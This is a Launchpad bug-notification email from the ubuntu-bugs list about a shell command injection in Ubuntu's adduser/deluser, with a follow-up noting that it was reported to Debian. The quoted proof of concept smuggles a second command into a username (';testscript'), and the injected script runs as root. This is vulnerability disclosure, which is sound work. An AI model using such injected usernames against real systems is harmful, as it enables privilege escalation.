Hi, I have reported this bug to Debian:
https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=940577 Warm regards, Haoxi On Tue, 17 Sep 2019 at 6:26 pm, Marc Deslauriers < marc.deslauri...@canonical.com> wrote: > Hi! Have you had a chance to report this issue to Debian? > > ** Changed in: adduser (Ubuntu) > Status: New => Incomplete > > ** Information type changed from Private Security to Public Security > > -- > You received this bug notification because you are subscribed to the bug > report. > https://bugs.launchpad.net/bugs/1838489 > > Title: > adduser & deluser shell command injection > > Status in adduser package in Ubuntu: > Incomplete > > Bug description: > deluser program is vulnerable to a command injection vulnerability > when a user is added via adduser with special characters (such as > ';'). It is only possible when the user exists on the system (adduser > does not prevent usernames with ';' to be added.) > > This can be a security risk when user accounts on the system can be > created from arbitrary input, and there are exploitable programs in > PATH to make privilege escalation possible. > > -------------- Proof of concept ---------------- > > # ll /test-file > ls: cannot access '/test-file': No such file or directory > > # cat /usr/bin/testscript > #!/bin/bash > touch /test-file > > # deluser > Enter a user name to remove: ;testscript > no crontab for root > crontab: usage error: no arguments permitted after this option > usage: crontab [-u user] file > crontab [ -u user ] [ -i ] { -e | -l | -r } > (default operation is replace, per 1003.2) > -e (edit user's crontab) > -l (list user's crontab) > -r (delete user's crontab) > -i (prompt before deleting user's crontab) > /usr/sbin/deluser: `/usr/bin/crontab -r ;testscript' returned error code > 1. Exiting. > (failed reverse-i-search)`': deluser^C > # ll /test-file > -rw------- 1 root root 0 Jul 31 10:25 /test-file > > > -------- system description -------- > > Description: Ubuntu 18.04.2 LTS > Release: 18.04 > > # apt-cache policy adduser > adduser: > Installed: 3.116ubuntu1 > Candidate: 3.116ubuntu1 > Version table: > *** 3.116ubuntu1 500 > 500 http://mirror.optus.net/ubuntu bionic/main amd64 Packages > 100 /var/lib/dpkg/status > > To manage notifications about this bug go to: > > https://bugs.launchpad.net/ubuntu/+source/adduser/+bug/1838489/+subscriptions > ** Bug watch added: Debian Bug tracker #940577 https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=940577 -- You received this bug notification because you are a member of Ubuntu Bugs, which is subscribed to the bug report. https://bugs.launchpad.net/bugs/1838489 Title: adduser & deluser shell command injection To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/adduser/+bug/1838489/+subscriptions -- ubuntu-bugs mailing list ubuntu-bugs@lists.ubuntu.com https://lists.ubuntu.com/mailman/listinfo/ubuntu-bugs